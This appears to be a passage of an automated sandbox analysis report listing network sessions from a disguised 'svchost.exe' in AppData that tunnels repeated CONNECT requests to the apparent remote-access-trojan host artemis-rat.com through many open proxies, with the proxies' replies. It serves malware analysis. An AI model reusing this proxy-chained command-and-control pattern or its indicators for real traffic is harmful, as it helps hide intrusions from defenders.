                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1974192.168.2.556338218.145.131.18244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.369407892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1975192.168.2.556341218.145.131.18244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.370728016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1976192.168.2.556343218.145.131.18244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.373025894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1977192.168.2.555870124.163.236.54730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.374558926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.855174065 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1978192.168.2.556347218.145.131.18244343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.375118017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1979192.168.2.556197104.16.108.2048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.376154900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.530427933 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1980192.168.2.55618134.49.208.2218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.376332045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1981192.168.2.556204172.67.181.128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.379102945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.534780025 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1982192.168.2.5560465.189.158.162312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.379607916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.740372896 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1983192.168.2.55603543.155.130.1821567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.381726027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1984192.168.2.55619950.63.12.334513443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.387764931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.848737955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.442773104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646296978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.833831072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942922115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146564007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1985192.168.2.556221104.17.16.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.388410091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.542409897 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1986192.168.2.556075121.159.146.2518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.392884970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.693088055 CET310INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 150
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1987192.168.2.555945103.121.39.158108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.394485950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1988192.168.2.5560458.219.177.1341567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.404046059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1989192.168.2.55623545.12.31.1408043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.407638073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.562144041 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1990192.168.2.556237104.22.14.488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.408454895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.562627077 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1991192.168.2.556240104.16.224.338043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.412789106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.566803932 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1992192.168.2.55606486.8.163.88915043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.412857056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.978105068 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1993192.168.2.5561043.9.71.167312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.415950060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.710051060 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1994192.168.2.55609427.96.235.1718043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.416080952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.707926035 CET326INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1995192.168.2.556168198.199.86.11312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.422911882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
